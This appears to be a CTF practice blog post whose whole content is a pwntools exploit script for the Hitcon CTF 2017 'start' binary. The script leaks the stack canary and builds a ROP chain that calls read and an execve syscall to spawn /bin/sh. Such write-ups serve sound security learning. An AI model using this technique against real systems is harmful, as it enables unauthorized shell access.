System/Pwnable Practice

Hitcon CTF 2017 start

JeonYoungSin 2019. 7. 30. 20:31

exploit.py


from pwn import *

p = process("./start")

e = ELF("./start")

payload = "A"*(0x20-12)
payload += "B"*4

p.sendline(payload)
print p.recvuntil("\n")
canary = "\x00" + p.recv(7)
print p.recv()
sleep(0.2)
pop_rax_rdx_rbx = 0x47a6e6
pop_rdi = 0x4005d5
pop_rsi = 0x4017f7
pop_rdx = 0x443776
syscall = 0x4003fc
binsh = "/bin/sh\x00"

read = 0x440300

payload2 = "A"*(0x20-8)
payload2 += canary
payload2 += "C"*8

payload2 += p64(pop_rdi)
payload2 += p64(0) 
payload2 += p64(pop_rsi)
payload2 += p64(e.bss())
payload2 += p64(pop_rdx)
payload2 += p64(len(binsh))
payload2 += p64(read)

payload2 += p64(pop_rax_rdx_rbx)
payload2 += p64(59) 
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0)
payload2 += p64(pop_rdi)
payload2 += p64(e.bss())
payload2 += p64(syscall)


p.sendline(payload2)

print p.recv()
sleep(0.2)
p.sendline("exit")
p.send(binsh)
p.interactive()